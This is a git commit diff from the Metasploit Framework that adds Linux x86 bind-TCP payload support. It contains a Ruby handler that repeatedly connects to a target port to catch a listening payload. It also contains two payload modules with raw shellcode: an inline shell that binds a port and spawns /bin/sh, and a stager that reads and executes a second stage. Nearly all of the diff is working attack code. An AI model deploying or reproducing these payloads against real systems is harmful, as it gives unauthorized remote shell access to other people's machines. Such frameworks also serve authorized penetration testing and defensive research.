bind tcp stager/inline for linux
git-svn-id: file:///home/svn/incoming/trunk@2776 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
46c2cd2ac1
commit
cc32a21386
|
@ -117,7 +117,7 @@ module Handler
|
|||
# The amount of time to wait for a session to come in.
|
||||
#
|
||||
def wfs_delay
|
||||
1
|
||||
2
|
||||
end
|
||||
|
||||
#
|
||||
|
|
|
@ -0,0 +1,112 @@
|
|||
module Msf
|
||||
module Handler
|
||||
|
||||
###
|
||||
#
|
||||
# BindTcp
|
||||
# -------
|
||||
#
|
||||
# This module implements the Bind TCP handler. This means that
|
||||
# it will attempt to connect to a remote host on a given port for a period of
|
||||
# time (typically the duration of an exploit) to see if a the payload has
|
||||
# started listening. This can tend to be rather verbose in terms of traffic
|
||||
# and in general it is preferable to use reverse payloads.
|
||||
#
|
||||
###
|
||||
module BindTcp
|
||||
|
||||
include Msf::Handler
|
||||
|
||||
def self.handler_type
|
||||
return "bind_tcp"
|
||||
end
|
||||
|
||||
def initialize(info = {})
|
||||
super
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RHOST,
|
||||
Opt::LPORT(4444)
|
||||
], Msf::Handler::BindTcp)
|
||||
|
||||
self.conn_threads = []
|
||||
end
|
||||
|
||||
#
|
||||
# No setup to speak of
|
||||
#
|
||||
def setup_handler
|
||||
end
|
||||
|
||||
#
|
||||
# Kills off the connection threads if there are any hanging around.
|
||||
#
|
||||
def cleanup_handler
|
||||
# Kill any remaining handle_connection threads that might
|
||||
# be hanging around
|
||||
conn_threads.each { |thr|
|
||||
thr.kill
|
||||
}
|
||||
end
|
||||
|
||||
#
|
||||
# Starts monitoring for an outbound connection to become established.
|
||||
#
|
||||
def start_handler
|
||||
listener_thread = Thread.new {
|
||||
client = nil
|
||||
|
||||
print_status("Started bind handler")
|
||||
|
||||
# Keep trying to connect
|
||||
callcc { |ctx|
|
||||
while true
|
||||
begin
|
||||
client = Rex::Socket::Tcp.create(
|
||||
'PeerHost' => datastore['RHOST'],
|
||||
'PeerPort' => datastore['LPORT'].to_i,
|
||||
'Comm' => comm)
|
||||
rescue Rex::ConnectionRefused
|
||||
# Connection refused is a-okay
|
||||
rescue
|
||||
wlog("Exception caught in bind handler: #{$!}")
|
||||
end
|
||||
|
||||
ctx.call if (client)
|
||||
|
||||
# Wait a second before trying again
|
||||
Rex::ThreadSafe.sleep(0.5)
|
||||
end
|
||||
}
|
||||
|
||||
# Valid client connection?
|
||||
if (client)
|
||||
# Start a new thread and pass the client connection
|
||||
# as the input and output pipe. Client's are expected
|
||||
# to implement the Stream interface.
|
||||
conn_threads << Thread.new {
|
||||
begin
|
||||
handle_connection(client)
|
||||
rescue
|
||||
elog("Exception raised from BindTcp.handle_connection: #{$!}")
|
||||
end
|
||||
}
|
||||
end
|
||||
}
|
||||
end
|
||||
|
||||
#
|
||||
# Nothing to speak of.
|
||||
#
|
||||
def stop_handler
|
||||
end
|
||||
|
||||
protected
|
||||
|
||||
attr_accessor :conn_threads
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
|
@ -23,6 +23,13 @@ class Rex::Socket::Tcp < Rex::Socket
|
|||
#
|
||||
##
|
||||
|
||||
#
|
||||
# Creates the client using the supplied hash
|
||||
#
|
||||
def self.create(hash)
|
||||
self.create_param(Rex::Socket::Parameters.from_hash(hash))
|
||||
end
|
||||
|
||||
#
|
||||
# Wrapper around the base socket class' creation method that automatically
|
||||
# sets the parameter's protocol to TCP
|
||||
|
|
|
@ -0,0 +1,44 @@
|
|||
require 'msf/core'
|
||||
require 'msf/core/handler/bind_tcp'
|
||||
require 'msf/base/sessions/command_shell'
|
||||
|
||||
module Msf
|
||||
module Payloads
|
||||
module Singles
|
||||
module Linux
|
||||
module X86
|
||||
|
||||
module ShellBindTcp
|
||||
|
||||
include Msf::Payload::Single
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Linux Command Shell, Bind TCP Inline',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Listen for a connection and spawn a command shell',
|
||||
'Author' => [ 'skape', 'vlad902' ],
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86,
|
||||
'Handler' => Msf::Handler::BindTcp,
|
||||
'Session' => Msf::Sessions::CommandShell,
|
||||
'Payload' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LPORT' => [ 0x14, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" +
|
||||
"\x43\x52\x66\x68\xbf\xbf\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" +
|
||||
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" +
|
||||
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0" +
|
||||
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" +
|
||||
"\x89\xe1\xcd\x80"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end end end end end
|
|
@ -8,7 +8,7 @@ module Singles
|
|||
module Linux
|
||||
module X86
|
||||
|
||||
module Shell
|
||||
module ShellReverseTcp
|
||||
|
||||
include Msf::Payload::Single
|
||||
|
||||
|
|
|
@ -0,0 +1,48 @@
|
|||
require 'msf/core'
|
||||
require 'msf/core/handler/bind_tcp'
|
||||
|
||||
module Msf
|
||||
module Payloads
|
||||
module Stagers
|
||||
module Linux
|
||||
module X86
|
||||
|
||||
###
|
||||
#
|
||||
# BindTcp
|
||||
# -------
|
||||
#
|
||||
# Linux bind TCP stager.
|
||||
#
|
||||
###
|
||||
module BindTcp
|
||||
|
||||
include Msf::Payload::Stager
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Bind TCP Stager',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Listen for a connection',
|
||||
'Author' => 'skape',
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86,
|
||||
'Handler' => Msf::Handler::BindTcp,
|
||||
'Stager' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LPORT' => [ 0x14, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" +
|
||||
"\x43\x52\x66\x68\xbf\xbf\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" +
|
||||
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" +
|
||||
"\xb0\x66\xcd\x80\x93\xb6\x0c\xb0\x03\xcd\x80\x89\xdf\xff\xe1"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end end end end end
|
Loading…
Reference in New Issue